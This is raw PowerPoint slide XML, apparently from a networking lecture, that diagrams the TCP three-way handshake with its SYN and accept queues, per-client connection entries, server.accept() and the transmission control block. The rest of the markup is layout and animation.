            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7463203" y="1833200"/>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sIP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135313" y="1821147"/>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sIP1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8141890" y="1605131"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7439094" y="1606229"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756032" y="1607325"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6098192" y="1608425"/>
            <a:ext cx="679783" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356095" y="1806871"/>
            <a:ext cx="679783" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651873" y="1282790"/>
            <a:ext cx="1257572" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7065216" y="4716725"/>
            <a:ext cx="1447254" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>accept queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3169858" y="4562836"/>
            <a:ext cx="974545" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>NewSock</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4716725"/>
            <a:ext cx="1846337"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38067" y="4447012"/>
            <a:ext cx="1811267" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>real communication </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565423" y="4552265"/>
            <a:ext cx="1500972" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>server.accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4144403" y="4706154"/>
            <a:ext cx="421020" cy="1057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a:off x="4035878" y="1343100"/>
            <a:ext cx="463759" cy="933032"/>
          </a:xfrm>
          <a:prstGeom prst="line">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45671" y="990178"/>
            <a:ext cx="3583588" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Transmission control block (TCB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45019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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 4.44444E-6 -3.95062E-6 L 0.22951 -0.0358 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="11476" y="-1790"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetID="63" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.01511 0.00062 L 0.22743 -0.04012 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="12118" y="-2037"/>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9" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.26406 0.06451 L 0.51406 0.31451 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="12500" y="12500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="65" presetID="49" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.26215 0.06513 L 0.51215 0.31513 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="12500" y="12500"/>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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="78" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="81" presetID="2" presetClass="exit" presetSubtype="4" fill="hold" grpId="3" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="82" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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1" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="2" animBg="1"/>
      <p:bldP spid="8" grpId="3" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="24" grpId="1"/>
      <p:bldP spid="24" grpId="2"/>
      <p:bldP spid="24" grpId="3"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30"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6093263" y="3830405"/>
            <a:ext cx="2898321" cy="255734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Shape 14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TCP 3-way Handshake Protocol (more details) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>
            <a:ext cx="990827" cy="434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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013076" y="2473485"/>
            <a:ext cx="1901163" cy="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81468" y="2126759"/>
            <a:ext cx="1138066" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053645" y="3342932"/>
            <a:ext cx="1901163" cy="657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9185" y="3030194"/>
            <a:ext cx="2215828" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=y, ACK=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5104852" y="1559085"/>
            <a:ext cx="3644443" cy="1420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5440344" y="1843056"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092707" y="1844159"/>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sIP4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
